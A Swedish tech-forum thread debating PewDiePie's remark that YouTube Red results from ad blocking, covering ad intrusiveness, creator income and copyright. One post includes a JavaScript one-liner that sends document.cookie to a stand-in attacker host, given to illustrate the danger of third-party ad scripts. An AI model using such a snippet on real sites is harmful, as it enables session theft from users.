PewDiePie: "Betaltjänsten Youtube Red är en konsekvens av Adblock"

Permalänk
Medlem

Jag tål inte reklam.
Jag får cancer i både ögonen och öronen av det, med tiden så har väl hjärnan skrynklat ihop sig av allt material och tjänster de försöker kränga.

Skickades från m.sweclockers.com

Visa signatur

If nobody hates you, you’re doing something wrong.

Permalänk
Skrivet av phlopydisk:

Borde de inte få in reklampengar från mobilanvändare? Finns det addblock till android & iphone?

Finns massor av olika adblockers till iPhone 5s och högre sen o med iOS 9 kom.
Rekommenderar starkt Purify.

Visa signatur

Apple MacBook Pro 15" Retina. 2,2 GHz Quad-Core Intel Core i7 Turbo Boost upp till 3,4 GHz, 16 GB 1600 MHz minne, 256 GB PCIe-baserad flashlagring, Intel Iris Pro Graphics.
Laptop 2. MSI GT 780DX, 17.3" LED matt (1920 x 1080), Intel Core i7-2670QM 2.2 - 3.1 GHz, Minne: 16 GB DDR3 1333MHz, NVIDIA GeForce GTX 570M 1.5 GB GDDR5, HDD Intel 320 SSD 120GB + 750 GB (7200 rpm).

Permalänk
Testpilot
Skrivet av Paddanx:

Jag har dock aldrig sett någon lägga ny asfalt på din tomt, städa din toalett hemma eller ta diktamen och sortera din post, och sen när de har gjort det, kräva dig på ersättning... för du har ju fått det utfört.
Där har du skillnaden.

Internet har både öppna, fria och publika sidor, samt låsta, betalande sidor.

Om man lägger upp något på det öppna och fria delen så får man förvänta sig exakt 0kr i intäkter för det också. Sen om du nu skulle råka få mer än 0kr.. så är det plus. Men ditt "jobb på youtube" är inte mer än en gatumusiker som spelar för folk som springer förbi, som kanske donerar några kronor. Du lever mao på folks bidrag, som de ska ha rätt att göra helt frivilligt. Eller så får du sätta det bakom en betalvägg... då säljer du en tjänst.

Om du dock lyckas så bra så du har sponsorer, som betalar dig, då är det väl en annan sak, då är du betald, dock får du ändå räkna med att lägger du upp det öppet, då är det också fri tillgång. Men långt ifrån alla är på den nivån, och det bör man vara medveten om.

Fast det tar ju betalt; Kallas skatt.
Sedan om jag vill skicka något med posten, då får jag betala det utöver skatten också. Så i den aspekten betalar jag alltså för att andra ska få skicka post, då jag själv inte gör det - Vilket då känns ännu mer förjävligt än att kika på reklam eller faktiskt betala för tjänsten jag vill ha.
Samma parallell kan man dra med TV-avgiften, har aldrig själv ägt en TV som jag faktiskt kollat TV. Mina föräldrar eller dylikt har, men har uteslutande alltid använt min TV till att koppla upp datorn, konsoler eller streama via PLEX på. Så varför ska jag då betala för andras TV?

Samma sak känner jag med YouTube, det är bara "gratis" för att någon i ledet betalar kalaset. Och då när folk snålåker på det genom AdBlock, istället för att kika på den lilla reklambiten på ett par sekunder eller betala vad en pizza kostar, då blir jag lite smått irriterad faktiskt. Speciellt när samma "snåla" människor sitter och använder tjänsten hela tiden, kanske tom. följer ett par YouTube kanaler (vet att en del här följer Austin, TekSyndicate och LinusTechTips) - Sedan sitter och säger att de får skylla sig själv att de valde en bransch som inte har en garanterad inkomst?

Jag kan helt enkelt inte se den logiska biten i detta eller förstå hur folk tänker och resonerar ibland känner jag. Ta det inte personligt, inte ett påhopp mot dig! Utan bara allmänt så kan jag inte förstå människor som ska både ha kakan och äta den samtidigt.

--- Andra paragrafen ---

Det som kliar fel för mig, är att många bara "vill ha" och inte är beredd "att ge" när det kommer till sådana här saker. Om statistiken stämmer, att ca. 40% av alla som sitter på YT använder AdBlocker's, då kanske vi får säga hejdå till gratis YouTube snart.
Vet redan att Sony Music och VEVO har dragit tillbaka hundra till tusentals klipp sedan RED lanserades, som en direkt respons att lägga dem bakom en PayWall istället (Play Music och YouTube-red med offline mode).
Så uppenbarligen tjänade de inte tillräckligt med pengar på reklam, som så många hävdar hela tiden att företag gör genom reklam.

Liten bit av mig hoppas att sajter som YT börjar exklusivt sätta 'premium-content' bakom PayWalls helt och hållet, så folk faktiskt fattar vad de riskerar att gå miste om.

Visa signatur

R < ROG G17 | R9 5900HX | 32GB 3200 MHz | RTX 3070 >

G < R9 5900X | 32GB 2666MHz | ROG RTX 3090 Ti >

B < RK96 | Leobog Hi75 | Deathadder V2 Pro >

Permalänk
Testpilot
Skrivet av Ozzed:

Det står, lite olika formulerat i olika konventioner att man har rätt att ta del av öppen kultur. Främst åsiftas väl bibliotek och liknande men då man inte lagligen kan avkrävas betalning för att ta del av till exempel ett öppet youtubeklipp får det nog ses som om det räknas in i samma kategori

Den tolkningen var nästan i stil med hur Jihadister och grupper som Al-qaeda eller IS tolkar koranen

Visa signatur

R < ROG G17 | R9 5900HX | 32GB 3200 MHz | RTX 3070 >

G < R9 5900X | 32GB 2666MHz | ROG RTX 3090 Ti >

B < RK96 | Leobog Hi75 | Deathadder V2 Pro >

Permalänk

100kr för att slippa reklam är för mycket, enligt mig.
50kr är mer rimligt. Och då tänker jag på spotify som har det för 50kr för att slippa reklam.

Visa signatur

Fractal Design Meshify 2 | MSI MAG B560 TOMAHAWK WIFI | Intel Core i5 11600K | MSI GeForce RTX 3060 12GB VENTUS 3X OC | ASUS ROG Strix 850W | Kingston Fury 32GB (4x8GB) DDR4 3200MHz | Noctua NH-U12S | Samsung 970 EVO Plus 2TB | W10

Permalänk

Ja, eller är det adblock som är en konsekvens av reklamen? Eller är det reklamen som är en konsekvens av att vilja tvinga sig in i en annan människas medvetande? Eller är det människans medvetande som är en konsekvens av betaltjänsten youtube? Jo som alla vet, i början var YouTube. Och människans handlingar är felaktiga. Vi måste buga och böja oss inför reklamen och youtube. Såklart är det vårat fel att reklamen finns till. Jajadå så mumsigt. NEJ. Konsekvensen är av YouTube. Inte reklamvägrare.

Permalänk
Medlem
Skrivet av Ozzed:

Det står, lite olika formulerat i olika konventioner att man har rätt att ta del av öppen kultur. Främst åsiftas väl bibliotek och liknande men då man inte lagligen kan avkrävas betalning för att ta del av till exempel ett öppet youtubeklipp får det nog ses som om det räknas in i samma kategori

Det där är verkligen inte vad som avses och jag tycker du förminskar de otroligt viktiga rättigheterna som är uppsatta. Vi har såklart laga rätt att undvika reklamen på Youtube men jag skulle verkligen inte förlöjliga de mänskliga rättigheterna för något så banalt som att man inte tycker det är roligt att se på reklam. Det är dock lite talande för vilket perspektiv man ofta ser här på forumet.

Permalänk
Medlem

Ja så blir det när folk insisterar på att köra adblock. Jag tycker att innehållet på youtube är, kvalitetsmässigt, ibland i lika hög grad eller till och med högre än det som visas på TV. Kan ge massor av exempel. Allt är "on demand", ofta i 1080p och i några fall 60 FPS. 100kr i månaden är rimligt. Om Spotify är 50kr (enbart ljud) så är väl 100kr för både ljud och bild rimligt?

Men tillbaka till adblock. Alltså seriöst, det är sååå mycket mer reklam på TV än youtube, varför köra adblock? Ni som kör adblock är svaga, det är bara att motstå det som sägs i 5-20sec, hur svårt kan det vara?! Det må vara lagligt att köra med det, men sjukt respektlöst. Jag hoppas åtminstone att ni inte nu klagar över de 100kr i månaden i alla fall...

Permalänk
Medlem
Skrivet av cheben:

Absolut finns det en risk för det (Har läst för mkt amerikansk kurslitteratur, så jag är mycket medveten om det ), risken med det som det är nu är ju att folk skulle dela upp sina videos onödigt mycket istället. Alla sätt har sina baksidor, men börjar kanaler ha för mycket filler så kommer du tappa prenumeranter. Jag tror inte risken är för överdrivet stor, i alla fall inte det innehållet jag konsumerar. Vi får se helt enkelt

Jo, vi kan ju inte mer än spekulera innan det hela hunnit etablera sig. Som du säger, vi får se helt enkelt.

Visa signatur

Nu lurade jag dig att slösa bort ett par värdefulla sekunder av ditt liv på att läsa denna fullständigt poänglösa signatur!

Permalänk
Avstängd

Adblock är en konsekvens av intrusiv, irriterade, påträngande, blinkande, animerad reklam med ljud som förstör hela användarvänligheten och besökarens förmåga att fokusera på innehållet.

Det är en konsekvens av reklamnätverk som spårar, stalkar, analyserar, kartlägger och identifierar besökare över ett stort antal siter.

Det är en konsekvens utav att dom säljer din personliga information och privata uppgifter till tredjeparter.

Det är en konsekvens av osäkra, skrupelfria annonsplattformar och nätverk som använts för att infektera besökares datorer och sprida malware via sårbarheter och säkerhetshål i plugins som Java och Flash.

Det är en konsekvens av reklam som är designad för att vilseleda användare genom att ut som informationsfönster från operativ systemet och varnar och ljuger om saker.

Permalänk
Medlem
Skrivet av rektor:

Adblock är en konsekvens av intrusiv, irriterade, påträngande, blinkande, animerad reklam med ljud som förstör hela användarvänligheten och besökarens förmåga att fokusera på innehållet.

Det är en konsekvens av reklamnätverk som spårar, stalkar, analyserar, kartlägger och identifierar besökare över ett stort antal siter.

Det är en konsekvens utav att dom säljer din personliga information och privata uppgifter till tredjeparter.

Det är en konsekvens av osäkra, skrupelfria annonsplattformar och nätverk som använts för att infektera besökares datorer och sprida malware via sårbarheter och säkerhetshål i plugins som Java och Flash.

Det är en konsekvens av reklam som är designad för att vilseleda användare genom att ut som informationsfönster från operativ systemet och varnar och ljuger om saker.

Fortfarande, hur svårt är det att bara hålla ut 5-20sec per klipp? Ingen tvingar dig att klicka på reklamen. Ingen tvingar dig att köpa något. (Nu pratar jag om enbart om youtube). Nä köper inte dina argument, att köra adblock är respektlöst mot de som lägger upp högkvalitativt innehåll på youtube oavsett hur pass jobbigt du än tycker att det är.

Permalänk
Medlem

Alla verkar ju reagera som om det är jättesynd om alla människorna som gör videos när dom spelar och sminkar sig och rantar om deras senaste haul från lågprisklädbutik X, Y och Z. Som om det är någon gudagiven rätt att tjäna pengar på videos man lägger upp. Det är ju mer en kultur som har gått från att folk börjar blogga och göra videos utan tanke på att tjäna pengar -> vissa blir stora -> dom stora lär sig tjäna pengar på reklam -> alla andra vill tjäna pengar på reklam. Och det är väl kanske lite okej om dom får visst betalt.

Youtube är en sida som har reklam för att finansiera sin drift och där användarna genererar innehåll som sedan andra användare tar del av. Precis som Swec. Handen på hjärtat, hur många av er som postar mycket på forumet anser att ni får för liten del av forumets annonsintäkter? Är det svårt att försörja sig på sitt postande på forumet? Är det ett problem att ersättning betalas per post och antal views och inte baserat på antalet tecken? Nä, precis.

Mycket av det som finns på youtube är dock inte sådant som användarna sliter i sitt svett för att skapa, utan sådant folk laddar upp utan att ha rättigheterna till. Alltså, Youtube är en piratsite och dom kommer undan med det genom att säga att dom tar bort sådant om det anmäls av upphovsrättsinnehavaren och att det är användarna som står för det illegala, bla bla bla. Upphovsrättsinnehavarens skyldighet anställa folk för att söka igenom Youtube och anmäla video för video... Juridiskt kanske inom ramarna. Men dom tjänar fortfarande pengar på reklam på program som streemas som ägs av SVT, BBC, etc. Då borde inte Google tjura över att några kör adblock.

Permalänk
Avstängd

Annonser fungerar så att websajten bäddar in ett JavaScript från en annonsplattform.

Jag vill inte att tredje-parter exekverar JavaScript i min webbläsare, då kan dom sno min identitet.

var img = document.createElement('img'); img.src = 'http://evil.example.com/collect.php?cookie=' + encodeURIComponent(document.cookie); document.body.appendChild(img);

Permalänk
Medlem
Skrivet av rektor:

Adblock är en konsekvens av intrusiv, irriterade, påträngande, blinkande, animerad reklam med ljud som förstör hela användarvänligheten och besökarens förmåga att fokusera på innehållet.

Det är en konsekvens av reklamnätverk som spårar, stalkar, analyserar, kartlägger och identifierar besökare över ett stort antal siter.

Det är en konsekvens utav att dom säljer din personliga information och privata uppgifter till tredjeparter.

Det är en konsekvens av osäkra, skrupelfria annonsplattformar och nätverk som använts för att infektera besökares datorer och sprida malware via sårbarheter och säkerhetshål i plugins som Java och Flash.

Det är en konsekvens av reklam som är designad för att vilseleda användare genom att ut som informationsfönster från operativ systemet och varnar och ljuger om saker.

...eller i korthet, hade det inte nätet varit packat med den sortens aktörer på annonsmarknaden som testar gränserna och tenderar att gå för långt, så hade adblocktjossanet förmodligen inte varit något större problem idag.

Instämmer, det som fick mig att börja köra adblock var att reklamen blev för intrusiv nångång för en massa år sedan. Gränsen jag tror mig ha definierat är den där det krävs engagemang för att komma vidare. En stillbildbanner är lugn, den fixar mitt mentala filter om den är ointressant. Är det en popup eller en lightbox, eller varför inte nåt animerat flashskräp med autoplay som jag aktivt måste klicka bort eller stoppa, så är gränsen nådd. Lättare att en gång för alla slänga på adblock och nita allt än att aktivt klicka bort skiten när den dyker upp.

Visa signatur

Nu lurade jag dig att slösa bort ett par värdefulla sekunder av ditt liv på att läsa denna fullständigt poänglösa signatur!

Permalänk
Medlem

En till ganska intressant aspekt här förresten. Utan att vara proffs i varken IT-svängen eller det ekonomiska, så antar jag att det tekniskt skulle vara ganska lätt att låsa ute adblockanvändarna om man bara ville. Varför gör man det inte?

Kan det möjligen vara så att det totala antalet användare är viktigare än antalet användare man kan pracka på intrusiva annonser? Är det möjligen så att det är dyrare att sparka ut adblockprocenten än att låta dem youtuba "gratis", eller med andra ord att det är en fråga om vinstmaximering snarare än att vända från förlust?

Det framstår som det framförallt är en fråga om att tjäna mera pengar, än att som man försöker ge sken av få det att gå runt.

Visa signatur

Nu lurade jag dig att slösa bort ett par värdefulla sekunder av ditt liv på att läsa denna fullständigt poänglösa signatur!

Permalänk
Medlem
Skrivet av phoenixdisciple:

Den tolkningen var nästan i stil med hur Jihadister och grupper som Al-qaeda eller IS tolkar koranen

Jag hoppas inte ditt inlägg var seriöst. Om du tycker att man kan likställa valet att lagligen undvika reklam men ändå ta del av innehåll med hur terroristorganisationer tolkar en skrift så blir det svårt att hävda att jag skulle vara den med skev världsbild.

Skrivet av Evil Peter:

Det där är verkligen inte vad som avses och jag tycker du förminskar de otroligt viktiga rättigheterna som är uppsatta. Vi har såklart laga rätt att undvika reklamen på Youtube men jag skulle verkligen inte förlöjliga de mänskliga rättigheterna för något så banalt som att man inte tycker det är roligt att se på reklam. Det är dock lite talande för vilket perspektiv man ofta ser här på forumet.

Jag tycker att man kan säga att det ingår i definitionen. Det är ju fritt tillgängligt material det handlar om och det finns inga lagliga hinder. Jag är rätt säker på att om någon skulle försöka hindra mig att titta så ligger de närmare att bryta mot de mänskliga rättigheterna än om jag tittar på innehållet.

Visa signatur

ozzed.net Min egenkomponerade 8-bit musik. Gillar du musiken från gamla klassiska NES eller Gameboy och liknande är det värt ett besök. :) Jag finns också på Spotify, Bandcamp, Jamendo, Youtube, och du kan även följa mig på Twitter och Facebook.
Vet du att du har fel? Signalera detta tydligt med Argumentationsfel och gärna Whataboutism.

Permalänk
Testpilot
Skrivet av Ozzed:

Jag hoppas inte ditt inlägg var seriöst. Om du tycker att man kan likställa valet att lagligen undvika reklam men ändå ta del av innehåll med hur terroristorganisationer tolkar en skrift så blir det svårt att hävda att jag skulle vara den med skev världsbild.

Självfallet inte seriöst, dock bottnade inlägget till en viss del i sanningen.

Att hävda att det är en mänsklig rättighet (i din tolkning) att få konsumera 'gratis' media i form av tex. YouTube, det är att sträcka det över en gräns med lilltån kvar på ena sidan. Kan ju inte tycka att YouTube faller under kultur direkt, ännu mindre att det skulle vara en rättighet att delta i det om det var en kultur, då det inte är bundet till ett specifikt land eller en region där man utöver mänskliga rättigheter och mäter dem.

I sådana fall borde internet i sin helhet anses som en mänsklig rättighet mer än något annat, då den moderna världen idag använder det så långt ner i sin infrastruktur som att sköta vatten och elkraftverk, tom. sjukvården använder internet i sina sökare för hemtjänst och alarm.
Detta skulle dock medföra andra saker, då när man mäter och försöker utöva mänskliga rättigheter måste börja ta tag i andra saker; tex. diskriminering och censur. Och då blir det helt plötsligt ett helt annat läge, då någon alltid lär stå tills svars som ansvarig för vad en användare utnyttjar deras tjänst till, eller användaren direkt - Och därmed ryker anonymiteten som folk värnar så gott om.

Visa signatur

R < ROG G17 | R9 5900HX | 32GB 3200 MHz | RTX 3070 >

G < R9 5900X | 32GB 2666MHz | ROG RTX 3090 Ti >

B < RK96 | Leobog Hi75 | Deathadder V2 Pro >

Permalänk
Medlem
Skrivet av VideoyGTX:

Varför ska ens pewdiepie uttala sig om detta fenomen. Jag undrar vad han vet om "hårt" arbete med tanke på att han en drop out från skolan också.

Samma sak skulle man kunna säga om Bill Gates och Steve Jobs...

Permalänk
Testpilot
Skrivet av m0rk:

Samma sak skulle man kunna säga om Bill Gates och Steve Jobs...

Håller med dig fullt ut här..

@VideoyGTX Så för att man har hoppat av skolan har man inga kvalifikationer att yttra sig eller? Eller menar du att det är kopplat direkt att om han inte gick klart skolan, då har han aldrig jobbat för något i sitt liv och har därmed ingen rätt att yttra sig om situationen?
Rätt säker på att man inte blir snorrik av att sitta på arslet och torrunka dagarna i ända.

Visa signatur

R < ROG G17 | R9 5900HX | 32GB 3200 MHz | RTX 3070 >

G < R9 5900X | 32GB 2666MHz | ROG RTX 3090 Ti >

B < RK96 | Leobog Hi75 | Deathadder V2 Pro >

Permalänk
Medlem

Vad är det här för konstig diskussion...
Det handlar inte ö.h.t. om ifall vi har rätt att blocka reklam eller inte för materialet har aldrig varit "fritt tillgängligt". Materialet är en del av en tjänst som youtube säljer, kostnaden brukade vara att du betalar genom att klicka på reklam, men folk sa vi vill inte klicka på reklam, så youtube svarar med: ok, att ta betalt genom reklam funkar inte, nu tar vi betalt på det traditionella sättet.

Skillnaden är alltså att när något kostar vanliga pengar och kunden inte betalar så finns det lagar mot det, men om något kostar reklam-klick och kunden inte klickar så finns det inga lagar mot det.

"Fritt tillgängligt" är en väldigt konstig tolkning av situationen. Får det att låta som att bara för att det inte finns lagar som säger att vi inte får skippa reklam så har vi en rättighet att skippa reklam. Det har vi inte. Avsaknad av ett förbud är inte automatiskt en rättighet. En rättighet är något som lagen förbjuder andra att ta ifrån oss.

Youtube har alltid varit en betaltjänst, du betalade inte för det fanns ingen lag som sa att du måste --> youtube inser att de inte kan komma frammåt längre med den existerande betalmodellen och byter till en modell där youtube har rättigheten att kräva pengar av dig enligt lagen.

-----

Detta för över tankarna till en annan diskussion här som går ut på att PewDiePie inte borde uttala sig.
Där har du en mänsklig rättighet! Lagen säger uttryckligen att han får uttala sig.

Visa signatur

SweClockers Dark Pearl tema: http://www.sweclockers.com/forum/trad/1484891
(Rek. Stylus)

Permalänk
Medlem
Skrivet av phoenixdisciple:

Håller med dig fullt ut här..

@m0rk Så för att man har hoppat av skolan har man inga kvalifikationer att yttra sig eller? Eller menar du att det är kopplat direkt att för att han inte gick klart skolan, då har han aldrig jobbat för något i sitt liv och har därmed ingen rätt att yttra sig om situationen?

Que? Mitt inlägget är snarare motsatsen.
Att inte förstå vad "jobba hårt" skulle vara för att man inte fullföljer skolan är riktigt dåligt argument. Många har saknar kanske talang för studier, är inte motiverade eller har helt enkelt andra talanger så som förmåga att starta företag. Både Steve Jobs och Bill Gates är goda exempel på detta då de hoppade av college för att starta företag. Pewdie å sin sida hade andra talanger så som "underhållning" som människor uppenbarligen är tillräckligt intresserad av för att han ska kunna tjäna storkovan år efter år.

Permalänk
Medlem
Skrivet av Ozzed:

Jag tycker att man kan säga att det ingår i definitionen. Det är ju fritt tillgängligt material det handlar om och det finns inga lagliga hinder. Jag är rätt säker på att om någon skulle försöka hindra mig att titta så ligger de närmare att bryta mot de mänskliga rättigheterna än om jag tittar på innehållet.

Du verkar i mina ögon inte alls förstå anledningen till varför man försökt enas om de mänskliga rättigheterna och jag ser bara den allmänna egoistiska inställningen många har nuförtiden. Självklart handlar de mänskliga rättigheterna inte alls om att slippa se reklam på Youtube. Det är både skrattretande och nedvärderande mot de mänskliga rättigheternas värde.

Och nej, Youtube skulle absolut inte bryta mot några mänskliga rättigheter om de satte en spärr för de som använder Adblocks. Det här var en ny bottennivå.

Permalänk
Medlem
Skrivet av Ozzed:

Då har han ju precis snubblat sönder sina egna argument. Han borde istället fördöma google som nu försöker gömma innehåll bakom en betalvägg.

Ursäkta men va? Vilka argument? Han argumenterar ju inte för något, han förklarar endast för folk som inte är insatta varför Google har släppt red (för att kontra Adblock då enligt Felix).Har du fortfarande inte läst!?

Är inte detta en ok lösning då? Google ser att många verka ogilla reklam och erbjuder då en lösning utan reklam. I praktiken är det dock tveksam då tyvärr de flesta kommer välja ett gratisalternativ framför något annat men personligen hoppas jag det funkar och kommer betala då jag ogillar reklam samtidigt som att jag gärna ser att de kanaler jag följer får mer pengar för att kunna producera bättre innehåll.

Permalänk
Avstängd

Är inte konstigt att dom flesta kör adblock och liknande lösnigar när hela nätet är förpestat med reklam och jag kör alltid adblock och vägrar använda betaltjänster med månadskostnad eller liknande lösnigar och byter sidor om sådant händer ...är även vrång till digitala tidnigar/spotify/netflix/spel med månadskostnad av samma orsak och inte av snålhet utan att jag hatar hela iden och vill jag använda något så köper jag och vill kunna använda det fritt och har 100+ köpta spel så vist köper jag saker men skulle aldrig betala för youtube eller liknande tjänster

Visa signatur

i3 6100 - MSI b150m pro-vd - 8gb 2133 ddr4 - GTX 950 GAMING 2G - z400s 120gb ssd - 1tb WD blue - Corsair 500w

Permalänk
Medlem

Sitter med paypalkontot i högsta hugg och väntar på att tjänsten kommer till Sverige. Känns inte rätt att blockera reklamen, men hade inte stått ut med att se den.

Permalänk
Medlem

Jag använder Adblock men lägger sidor jag frekvent använder på whitelist förutsatt att reklamen inte är för invaderande. T.ex. Sweclockers, FZ.se, Youtube, Facebook etc har whitelist. Däremot använder jag Privacy Badger på samtliga sidor.

Permalänk
Avstängd

skitsnack

Det finns för mycket olagligt material på youtube för att de ska våga låta den gå med vinst.
Allt som Kim Dotcom är anklagad för gör Youtube själva...

Dom som inte vet vem det är, googla...

PS. undrar hur det kommer att gå nu, med prenumeration... Vad händer med alla låtar + filmer som är på youtube utan bolagens tillåtelse? Tror det kommer att bli en del advokater med fetare plånbok...

Visa signatur

Linux + AMD 1055T, Kingston 16GB ECC, Asus M5A88-M EVO, Sapphire 5850, Antec P180 mini, Cooler Master Silent Pro M600

Permalänk
Medlem
Skrivet av sae:

Det finns för mycket olagligt material på youtube för att de ska våga låta den gå med vinst.
Allt som Kim Dotcom är anklagad för gör Youtube själva...

Dom som inte vet vem det är, googla...

PS. undrar hur det kommer att gå nu, med prenumeration... Vad händer med alla låtar som är på youtube utan skivbolagens tillåtelse...

Större delen av sidan går väl ut på att strömma material illegalt som dom inte har copyright på. Folk som pewdiepie kanske i undantag kan få några miljoner views på ett klipp om dom har tur och är riktigt stora men det är en piss i havet om man jämför med alla gamla musikvideos som knappast är upplagda av rätt skivbolag om man kollar på kontot. Där handlar det ofta om 100 miljoner+ views per klipp. Det är vad Youtube tjänar pengar på.

Permalänk
Inaktiv
Skrivet av Ozzed:

Adblock är inte olagligt så torka krokodiltårarna din förbannade sprätt! Det är vår mänskliga rättighet att fjärna oss från den skamlösa exploateringen av folks privatliv som riktad reklam innebär.

Sluta gnäll och lobba för att Adblock ska bli olagligt istället om det är så jävla viktigt... Eller så kan du göra som hederligt folk och leverera innehåll som folk är beredda att betala för. Bland annat därför har jag adblock avaktiverat på Swecklockers och ett fåtal andra sidor.

Håller fullständigt med, om dem inte kan leverera något jag vill titta på så ska dem inte gnälla när man blcokerar det skräp dem försöker trycka ner i halsen på mig.

Permalänk
Medlem
Skrivet av anon150792:

Håller fullständigt med, om dem inte kan leverera något jag vill titta på så ska dem inte gnälla när man blcokerar det skräp dem försöker trycka ner i halsen på mig.

Nu pratar du ju om ett riktigt ickeproblem. Om någon inte kan leverera något du vill titta på så kommer du ju automatiskt inte se någon reklam ändå eftersom du inte tittar på dennes videos. Det är ju när du vill se någons videor som det kan vara relevant att använda en adblocker. Sitter du och tittar på videos du inte vill se är nog inte reklam det största problemet.

Dessutom håller du med ett inlägg som (föga förvånande) fullständigt missade poängen med vad PewDiePie säger. Han berättar att han är helt okej med att folk använder adblocks på hans videos och förstår att det är dryg med reklam. Så varför är han en "förbannad sprätt" med "krokodiltårar" när han säger att det är helt okej att folk tar bort reklamen när de ser hans videos?

Det han säger är bara en förklaring till varför Youtube Red skapats.